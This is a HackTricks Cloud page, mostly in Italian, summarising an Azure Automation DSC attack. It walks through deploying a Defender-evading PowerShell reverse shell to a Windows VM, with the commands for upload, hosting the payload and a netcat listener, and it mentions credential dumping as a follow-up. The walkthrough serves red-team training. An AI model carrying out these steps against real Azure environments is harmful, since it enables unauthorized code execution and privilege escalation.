Az - State Configuration RCE

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Controlla il post completo in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Riepilogo della Preparazione e dei Passaggi dell'Infrastruttura del Server Remoto (C2)

Panoramica

Il processo prevede la configurazione di un'infrastruttura di server remoto per ospitare un payload modificato di Nishang Invoke-PowerShellTcp.ps1, chiamato RevPS.ps1, progettato per eludere Windows Defender. Il payload è servito da una macchina Kali Linux con IP 40.84.7.74 utilizzando un semplice server HTTP Python. L'operazione viene eseguita attraverso diversi passaggi:

Passo 1 — Creare File

File Richiesti: Sono necessari due script PowerShell:

reverse_shell_config.ps1: Un file di Desired State Configuration (DSC) che recupera ed esegue il payload. È disponibile su GitHub.
push_reverse_shell_config.ps1: Uno script per pubblicare la configurazione nella VM, disponibile su GitHub.

Personalizzazione: Le variabili e i parametri in questi file devono essere adattati all'ambiente specifico dell'utente, inclusi nomi delle risorse, percorsi dei file e identificatori del server/payload.

Passo 2 — Comprimere il File di Configurazione

Il reverse_shell_config.ps1 viene compresso in un file .zip, rendendolo pronto per il trasferimento all'Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Step 3 — Imposta il contesto di archiviazione e carica

Il file di configurazione compresso viene caricato in un contenitore di archiviazione Azure predefinito, azure-pentest, utilizzando il cmdlet Set-AzStorageBlobContent di Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Step 4 — Prep Kali Box

Il server Kali scarica il payload RevPS.ps1 da un repository GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Lo script viene modificato per specificare la VM Windows target e la porta per la reverse shell.

Step 5 — Pubblica il file di configurazione

Il file di configurazione viene eseguito, risultando nel deployment dello script della reverse shell nella posizione specificata sulla VM Windows.

Step 6 — Ospita il payload e imposta il listener

Viene avviato un Python SimpleHTTPServer per ospitare il payload, insieme a un listener Netcat per catturare le connessioni in arrivo.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Il compito pianificato esegue il payload, ottenendo privilegi a livello di SYSTEM.

Conclusione

L'esecuzione riuscita di questo processo apre numerose possibilità per ulteriori azioni, come il dumping delle credenziali o l'espansione dell'attacco a più VM. La guida incoraggia a continuare a imparare e a essere creativi nel campo di Azure Automation DSC.

Support HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 3 days ago